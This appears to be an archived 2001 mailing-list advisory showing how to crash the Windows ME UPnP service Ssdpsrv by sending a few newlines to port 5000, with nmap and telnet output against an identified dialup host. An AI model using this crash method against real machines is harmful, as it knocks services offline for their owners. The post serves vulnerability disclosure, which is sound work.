By connecting to a computer running Ssdpsrv you are able to crash the Ssdpsrv server. Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. This service comes standard with the WindowsME installation. The Ssdpsrv.exe server is started at boot. Here is the registry entry: KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices Here is the file that starts the server: c:\windows\system\ssdpsrv.exe For information about UPnP go here: http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP Upon running a scan on a computer running the server I get the following: <snip> bash-2.05$ nmap -sT 165.121.234.217 Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ ) Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217): (The 1547 ports scanned but not shown below are in state: closed) Port State Service 139/tcp open netbios-ssn 5000/tcp open fics Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds </snap> Method to crash Ssdpsrv: Connect to the computer on port 5000. Send 3 to 5 newline characters. You then get an error and are disconnected. <snip> bash-2.05$ telnet 165.121.234.217 5000 Trying 165.121.234.217... Connected to 165.121.234.217. Escape character is '^]'. HTTP/1.1 400 Bad Request Connection closed by foreign host. bash-2.05$ </snap> Here is the error caused by the crash: Ssdpsrv has caused an error in MSVCRT.DLL. Ssdpsrv will now close. If you continue to experience problems, try restarting your computer. This causes the server crash and closes port 5000. Either you must restart the server by manually running ssdpsrv.exe or reboot. shouts to pulltheplug #c. :o _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
This archive was generated by hypermail 2b30 : Thu Oct 18 2001 - 09:21:46 PDT